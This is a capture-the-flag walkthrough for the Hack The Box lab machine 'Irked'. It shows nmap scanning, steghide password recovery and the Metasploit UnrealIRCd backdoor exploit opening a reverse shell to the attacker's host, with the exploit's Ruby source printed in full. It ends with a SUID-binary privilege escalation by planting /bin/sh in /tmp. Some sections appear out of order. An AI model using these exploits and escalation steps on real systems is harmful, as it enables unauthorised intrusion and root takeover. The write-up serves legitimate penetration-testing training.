Today we are going to solve another CTF challenge “irked”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Easy
Task: To find user.txt and root.txt file
Note: Since these labs are online available, therefore, they have a static IP. The IP of irked is 10.10.10.117
Scanning
Let’s start off with our basic Nmap command to find out the open ports and services.
root@kali:~/htb# nmap -p- -sV 10.10.10.117 --open Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-04 05:49 EDT Nmap scan report for 10.10.10.117 Host is up (0.027s latency). Not shown: 65427 closed ports, 101 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.10 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 34772/tcp open status 1 (RPC #100024) 65534/tcp open irc UnrealIRCd Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 26.89 seconds
Enumeration
I tried to extract hidden information with the help of steghide, but we need to find the passphrase for that.
root@kali:~/htb# steghide extract -sf irked.jpg Enter passphrase:
Exploiting
Fortunately, I found an exploit for unrealircd in Metasploit, although the default port for ircd is 6667, it runs on 6697 here. I pwned the victim machine successfully after running the module.
msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117 rhosts => 10.10.10.117 msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697 rport => 6697 msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.14.5 lhost => 10.10.14.5 msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit [*] Started reverse TCP double handler on 10.10.14.5:4444 [*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697... :irked.htb NOTICE AUTH :*** Looking up your hostname... [*] 10.10.10.117:6697 - Sending backdoor command... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo jt9flkHuSYLifEoc; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "jt9flkHuSYLifEoc\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (10.10.14.5:4444 -> 10.10.10.117:34526) at 2019-09-04 05:07:52 -0400 python -c 'import pty;pty.spawn("/bin/bash")' ircd@irked:~/Unreal3.2$ cd /home cd /home ircd@irked:/home$ ircd@irked:/home$ ls ls djmardov ircd ircd@irked:/home$ ircd@irked:/home$ cd djmardov/Documents ircd@irked:/home/djmardov/Documents$ ls -la ls -la total 16 drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 . drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 2018 .. -rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup -rw------- 1 djmardov djmardov 33 May 15 2018 user.txt ircd@irked:/home/djmardov/Documents$ ircd@irked:/home/djmardov/Documents$ cat .backup cat .backup Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss
root@kali:~/htb# curl http://10.10.10.117 <img src=irked.jpg> <br> <b><center>IRC is almost working!</b></center> root@kali:~/htb# curl http://10.10.10.117/irked.jpg -o irked.jpg % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 34697 100 34697 0 0 491k 0 --:--:-- --:--:-- --:--:-- 491k root@kali:~/htb# steghide extract -sf irked.jpg Enter passphrase: UPupDOWNdownLRlrBAbaSSss wrote extracted data to "pass.txt". root@kali:~/htb# cat pass.txt Kab6h+m+bbp2J:HG
nmap
also gave me the name of the irc server, UnrealIRCd. searchsploit
shows there are exploits if the version is 3.2.8.1:
root@kali:~/htb# searchsploit UnrealIRCd ---------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ---------------------------------------------------------------- ---------------------------------------- UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | exploits/linux/remote/13853.pl UnrealIRCd 3.x - Remote Denial of Service | exploits/windows/dos/27407.pl ---------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result root@kali:~/htb# searchsploit -m exploits/linux/remote/16922.rb Exploit: UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) URL: https://www.exploit-db.com/exploits/16922/ Path: /usr/share/exploitdb/exploits/linux/remote/16922.rb File Type: Ruby script, ASCII text, with CRLF line terminators Copied to: /root/htb/16922.rb
root@kali:~/htb# cat 16922.rb ## # $Id: unreal_ircd_3281_backdoor.rb 11227 2010-12-05 15:08:22Z mc $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution', 'Description' => %q{ This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 11227 $', 'References' => [ [ 'CVE', '2010-2075' ], [ 'OSVDB', '65445' ], [ 'URL', 'http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt' ] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl ruby bash telnet', } }, 'Targets' => [ [ 'Automatic Target', { }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 12 2010')) register_options( [ Opt::RPORT(6667) ], self.class) end def exploit connect print_status("Connected to #{rhost}:#{rport}...") banner = sock.get_once(-1, 30) banner.to_s.split("\n").each do |line| print_line(" #{line}") end print_status("Sending backdoor command...") sock.put("AB;" + payload.encoded + "\n") handler disconnect end endroot@kali:~/htb#
It looks like the exploit is to connect and then send “AB;” + the payload + “\n”.
Privilege Escalation
First, I open the user.txt file and finish the first challenge. Now let’s penetrate more to find the root.txt file, and that’s why we need to increase the privilege, so I’m trying to find out if there’s any suid permission script.Here /usr/bin/viewuser looks more interesting, let’s check it out.
root@kali:~/htb# ssh djmardov@10.10.10.117 djmardov@10.10.10.117's password: Kab6h+m+bbp2J:HG The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Sep 4 05:13:43 2019 from 10.10.14.5 djmardov@irked:~$ pwd /home/djmardov djmardov@irked:~$ cat Documents/user.txt 4a66a78b12dc0e661a59d3f5c0267a8e djmardov@irked:/$ find / -perm -u=s -type f 2>/dev/null /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/openssh/ssh-keysign /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper /usr/sbin/exim4 /usr/sbin/pppd /usr/bin/chsh /usr/bin/procmail /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/at /usr/bin/pkexec /usr/bin/X /usr/bin/passwd /usr/bin/chfn /usr/bin/viewuser /sbin/mount.nfs /bin/su /bin/mount /bin/fusermount /bin/ntfs-3g /bin/umount djmardov@irked:/$ ls -la /usr/bin/viewuser -rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser djmardov@irked:/$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2019-09-04 05:05 (:0) djmardov pts/1 2019-09-04 05:13 (10.10.14.5) sh: 1: /tmp/listusers: not found djmardov@irked:/$ echo '/bin/sh' > /tmp/listusers djmardov@irked:/$ chmod 777 /tmp/listusers djmardov@irked:/$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2019-09-04 05:05 (:0) djmardov pts/1 2019-09-04 05:13 (10.10.14.5) # id uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth) # cd /root # ls pass.txt root.txt # cat root.txt 8d8*****af3
So, when I run the program, I found that this application was being developed to set test user permissions but couldn’t find listusers file within /tmp. This program is, therefore, searching for data from the listusers file and the file is missing from the directory inside /tmp.
So what we can do is write a script to call bin / sh and save it as listusers inside /tmp and then run the viewuser to run it.
Now we have a root shell
Credits to hackingarticles.in
Author: Jacco Straathof